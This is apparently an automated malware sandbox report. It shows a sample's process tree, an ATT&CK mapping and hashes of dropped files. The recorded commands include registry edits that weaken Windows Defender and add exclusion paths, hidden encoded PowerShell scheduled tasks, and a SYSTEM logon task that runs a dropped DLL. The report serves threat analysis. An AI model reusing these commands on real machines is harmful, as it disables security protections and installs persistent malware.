- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3528
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bgwuTdWixDdNC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bgwuTdWixDdNC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kwkuzFKVqEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kwkuzFKVqEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\namDtuGKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\namDtuGKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wEnnazEvJNiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wEnnazEvJNiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BRUhuLZnBvQZvqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BRUhuLZnBvQZvqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2948
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BRUhuLZnBvQZvqVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BRUhuLZnBvQZvqVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\sFyaDrJXZzAeWCdu /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\sFyaDrJXZzAeWCdu /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3232
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gEIzgwGmB" /SC once /ST 11:27:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2540
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gEIzgwGmB"
  2⤵
  PID:6208
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gEIzgwGmB"
  2⤵
  PID:5512
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "KdMGsZYUagVlNoZLt" /SC once /ST 00:34:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\ZLQARRG.exe\" WB /Xoaldidtl 385137 /S" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3796
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "KdMGsZYUagVlNoZLt"
  2⤵
  PID:5600
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 212 -s 880
  2⤵
  - Program crash
  PID:3700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:60
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:6936

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:6012

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4324

C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\ZLQARRG.exe
C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\ZLQARRG.exe WB /Xoaldidtl 385137 /S
1⤵
PID:5944
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bsqNJSiTyoMLfdbIdy"
  2⤵
  PID:6080
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:1184
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:4552
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:3936
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4368
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5152
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\namDtuGKU\owPukh.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jRbEfcGJuWiRduS" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3064
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:292

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\FBFHDBKJEGHJ\BFHJEC

Filesize
92KB

MD5
55d8864e58f075cbe2dbd43a1b2908a9

SHA1
0d7129d95fa2ddb7fde828b22441dc53dffc5594

SHA256
e4e07f45a83a87aff5e7f99528464abaad495499e9e2e3e0fcd5897819f88581

SHA512
89ce123d2685448826f76dce25292b2d2d525efd8b78fd9235d1e357ad7ae2d4b3461ef903e2994cd2b8e28f56b0cc50137dd90accdd3f281472e488f6c7cf2e

Download Submit
C:\ProgramData\GCGCFCBAKKFBFIECAEBA

Filesize
6KB

MD5
8a513a1e498f055ec4fff0c46a6eff40

SHA1
f45969a53456dd2562cf4b4bce0f67ebd0079608

SHA256
2119eff9a99a52d140e1a7fb93916f5be75d70c563a44bc5a0adf210377bd48e

SHA512
1dd7c3b51bd376ac411c96a5fe6474e281e2332e2db7d2820e184cf8dd8d3507f9f7ad85de472ebf5b85e5c0d0fd954f4f77c1d41401d8e7e8cddfa492241baa

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
e8d18d7e22c42d18a1f6936abc4f1e60

SHA1
93c687f2262749d2d034ff2eca8bc5e16572e399

SHA256
84f0c3dcb3e1e9e89709ccd9e2cea0650d853d5d614261efe86b936ce32ef89d

SHA512
defd96160752db39593eefe1931555e77406ae7bb8d5d87d0355f59b9772763cc94534cbea9e9e2cb58a6632232980e0202651cc5d1e22d1276bc830734d4cc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
14KB

MD5
656c9458307a20b5fdd16ae8963118ce

SHA1
f1fd82137a7c95f7db65b52f9e7b335478655cf7

SHA256
3ee68093ec45841686bfebccea17c38b96ac4c5bbe3a29cb2c360c3e49af3a00

SHA512
3a15ae0c9c9536b1369b968ec34da37d6e766a1365356de97b60948f63e4ff250e5ecec999173e41b56a8fa76d8c6073f6bdc504c051374b0de4c19131321af4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
10ed0937865e2e31d2217509a0aa4182

SHA1
20348af6c33111434e08cea00369797cea929ab3

SHA256
24af03449cadeacb222bc12319df9d382b58deb3c880638418affae5bf5d3554

SHA512
ee8b481ad894298725e06955a5e72a0a9ada3f1ee3a408693151ea6fbe555ade24f71234eeaa9d267ba16a2ee5e3156b846683bec66f873d5600822ab0c9ba8a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\je1358xf.default-release\cache2\entries\79B0DDE3FA8DCB1BD2B4CA2ED3EB8F3088226A6C

Filesize
412KB

MD5
15698fcc61fdc12755d59771bff0c38c

SHA1
244493f02c162fe73796bd08b9b8403c2d9f0f3c

SHA256
2ca52f267a4fea0a62a18a0c03b641795b7aa510a11d929c2b229cc173b85416

SHA512
96d72d4ca07a3c979383bdd60c8a7bfa5c4366143a402fc2db3250cb2abdc4fb37a2e4bccf83d9225866c68f0b5c9789329ce37b1170a6199e0e33e8d254e86b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000006001\e5f4ef64a7.exe

Filesize
2.4MB

MD5
8369d155da8c3f7bcea8490d36f2f114

SHA1
3d7fc15294497e6af579bdf8343eae47a05ae2c2

SHA256
2ea252fc14bd9190e6a6d57b8f2ecb7870a4eecf01acfbba9d0f698838f03fe8

SHA512
81afcb035c63110ed2cc845ac77472a54ebb6ecc939d8dcadc9e0640bec1d9914775f16aa113a681d171c0f3ab3ad73bfb7f646796476233b3d7cc867d0aa47a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7AAF.tmp\Install.exe

Filesize
6.4MB

MD5
9a2046bd790709c275a3fdd4de53551d

SHA1
53f37fcf374a6a02ec644a03b8cf4c75ae480826

SHA256
0dcd394cde68022823afb7d33d50a289df5cc696132c660e34b1e0b640afd07c

SHA512
3afe6f972e736e0d01219635745d9ae1862e1c7a0bc281647207480857945d633aeb87b02ab2c57a59e5cf71fedd18fdf14210375aec55e282b0f38ca1791a77

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7ABF.tmp\Install.exe

Filesize
6.4MB

MD5
e2deeda30f234eec689355a47193e0fc

SHA1
11840fb567c2a0b6411811bbe862494e8d62a196

SHA256
95a01297d7b226d65f09a8251fd0062cb5658efd4b3a2fd64b44a03a0440f398

SHA512
e196410dbd5787033304357943dd04d1fc3134b21441ed42d6988dec42e35339cd1981b5469d39e14e43d6a1bffc8adf28a2564777e7890a569b222a1e1e65ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS830C.tmp\Install.exe

Filesize
6.7MB

MD5
84da5fc2f43e551848349f0d0d3faca4

SHA1
cf0078c71fb1ef9743451b6a20d9aa0306e697db

SHA256
1989cb898e0e397b9acc16c453c94cf3f1873573979d36873182b18b8da86938

SHA512
9a605654c70dc27ae52760b2ced4aa3eedda6e98919ef96d9615c754f07e12c1748f6f978ffc916cb693e7788b21dc101a2442e3251f9a598aa223d9ead238bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS836A.tmp\Install.exe

Filesize
6.7MB

MD5
71bf676ae80afa9f2577d2eae6a133ae

SHA1
0fedcfbd17c9a11a97ce5c6b984926b5a510f533

SHA256
9f803c1fd9944d0050032ecd983de008c13c0e939e66d13c1d138551d290be99

SHA512
f8150af3a932ead9e6968569978ddba194b6355d4ac65bfcd7e54302e2f7f4b944c27baf3763297f5edc2d8eddb89bafea2489a79e1a77c695cc65fd967cf545

Download Submit
C:\Users\Admin\AppData\Local\Temp\Assist

Filesize
43KB

MD5
3d5a4446b998817ac3a378b584c185db

SHA1
8d45506c4e96d1832f6196f520ebaf7c306bfa0d

SHA256
1e5e63511babdfb0c84c679197f7f8229f217c5e906ae5f74ad27b3b4712c872

SHA512
6f174d0d9efe9ddd3d2d33d43dd199e0ca97b14a0c0bc809627aa6f4066a740a0d26f73b7993183822eaa8f94388bd7197e6c2b9d73051b6947baeb6696b1ea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\EBGCFBGCBF.exe

Filesize
1.9MB

MD5
f4725cf3a9c819a354f92e948fd2b232

SHA1
00461514d81b209e3678cf018607a1e740dd4477

SHA256
0a99c76bf83db04806ed8885d825506a7a0fd57e73284a7620f0d32414f52187

SHA512
f5f9964981283f443b9cbc67ad2b36f431319a1936fd68e5151c6d49b6e09871acf89a8e8ce068495d7f7bf8eadafdcf3e886d06853d31540ab30f664b40521d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Examples

Filesize
69KB

MD5
cb2749a3d65fff87fcb0b47adb23fa76

SHA1
b0b6a9d11c7ee02d0d8953d450e9696cc601b7dc

SHA256
9919ebf3a126ccefccb5236c053dd2a511ea21a58e478f7ea747055c8ef09c6c

SHA512
0ccb7889ee9c94d5d38a03321ba2b5f6316f996792e494e68be75bac72c23db5a486c6bd40a21270ddea2db727c54a7566fcab5645e0defce289931f8825d6b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fundamental

Filesize
49KB

MD5
230ed0afa33749b3c72b2ffde41dd1e3

SHA1
9c09200619efecb0a6dfe689edc322a281d83aa8

SHA256
abc1fc7f2d61a140868d22644c4309275989ecc5ef491155dcaf9459b438dcc9

SHA512
31b32ac30e5055d53d708b91fdb39df071f346d4a4417dc508d26153a5dbac2b4906a0e891d205d7d9809ee24eb3fd733e0c5394bed9b9b4804f8fd4356c2979

Download Submit
C:\Users\Admin\AppData\Local\Temp\Grande

Filesize
45KB

MD5
23bdc147635d0923b3ea85727ca548fd

SHA1
5d7be4a43b8f964b3b8cde3dc2f314ad53c4ce96

SHA256
457709d49819cbf2c82da81e53db0c08ce060919a8fd51742d6bc524023b0a6e

SHA512
3331c535e933eec9bce89cfe3707c1a2044860d2ad6f1af732061971803e884a0ae470fa098a1c3786bd39b82480915750d2914cbe634127bebb38c1aa1c41e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Harbor

Filesize
7KB

MD5
0b905402cbc77bf185cfecaa3a0012a3

SHA1
01c7fcbfd193ea9596275dba7ca781c8b9522f12

SHA256
5b180090eee932b7bbe1ddb907ca605132e7c01296ab9c46f27aa5cf05b18a95

SHA512
9c97d30220fd3dd9ae2b3c841328178e711f4958f58a0f40072d10445baa0b27a9bd44a579cb723757afdb13f08cc603b42062f838e9b0f797c99a53c2e203b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Knowledgestorm

Filesize
61KB

MD5
5882258da7a689077b2f1dcbaaf43bd8

SHA1
71869c35d792e014beebdbd7d618803da9873074

SHA256
b69a3f1178ca18c6a34dbadea494ba9eb5e3956c3d13a504355a84154ea87067

SHA512
d96d61cdd4dad758c55081a79720d06e92434a4cff0610577618727a2d9368312acb1c448736b2bd0d1e3c99bf72bb1e9a281bf7bfbe8a96851794b2b43287ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Like

Filesize
24KB

MD5
409794898e575cf088a4b1d21233a91f

SHA1
67f47df2bba5a90b5ecc57c9641fed44c48cff35

SHA256
dce624d7c6c7525c6029bd118d98da93d6e94795a23ff3bddb619e5876e5b23c

SHA512
e4d87a890aa899c338d8f272cdac9f8c5c22f79007cb8b78a1ee989dfcbf7aaf84fdb88e6afd48d198cbdae6fea3540d8021b92dea58913698da80314ca5e738

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stylus

Filesize
208B

MD5
ce77907dd56d674bcd0bbcfb7011bd93

SHA1
c8483cacfe2f8e81f8ef1a5068b6a42142c1cf4f

SHA256
748d79ad490a68ce10d337bdb791dadef6fec2e34b69b1eea4b976a95d53a0a1

SHA512
3c97ad521e092b429f210a4c98cd3de01c063fabc1f0d1d91a2389f4e223b4469be2b4db5d7a2a8c610331864bf684f1d8f1d1b654bf1b656508d91f12c7cf5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Urban

Filesize
19KB

MD5
0acf541cbe9a635dab7b5bcf6f2bb645

SHA1
765e9babeddb81d9c0b88282e6b8a9ada0445de4

SHA256
873200c6afe55ab1b0c4bdea11370b84bca64d0bf7a5d2976416c43cda53bdfd

SHA512
71d1c51aa76b0e3adac409bc8124b57c529e12918b58dc42e4ffea603771377d654c88f7733ca04dd2b7daab45bd4b4a00aa5ca68604151c6077b6c803e3fe21

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wisdom

Filesize
39KB

MD5
60cd333a8df0712024e4ff8695689fdf

SHA1
b8aa530305d049a70c01120c890477bd21893391

SHA256
c086e5371c551846794ac35bd3a96bef3fc4492592d89385557805eb6c739cfa

SHA512
4bab10910a86673ae031b1ff6598efeb51d6e13632b06ac09cc6c5e3c64d054d0ce7036c9595ef6c894443a7b73e323fcb22725c87b2154ff2dec5238c541a0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3gq4mrwk.yzj.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-S688J.tmp\mtLXB8vLnuL2pf2PMh9t8f_d.tmp

Filesize
680KB

MD5
abcd6f574ffe756e51da3afb3c212040

SHA1
ea0ecf034c3122d64395aaafa59ea701d6b86c00

SHA256
441148131dcb4a120bbc5909fafc077d739274062eddb093fe3d072ec3dc29b7

SHA512
41d2fafdd9b89da7510d683ae8d0b4fc7ff92889d8b684a04b7684940b2db3587685c453547afec570ee1f28ad95376d3ac052372f0a08a0eb4604dd811f7c03

Download Submit
C:\Users\Admin\AppData\Local\UDA DVD Free Ripper\udadvdfreeripper32_64.exe

Filesize
4.0MB

MD5
5251f2313317179945be88093e1e2b5c

SHA1
e3959b81ed43aaf8643618067422b81e45715c35

SHA256
bf409fc892754926fcdf1e847e0e91b2c9536000d52df5672619e65b52254fd6

SHA512
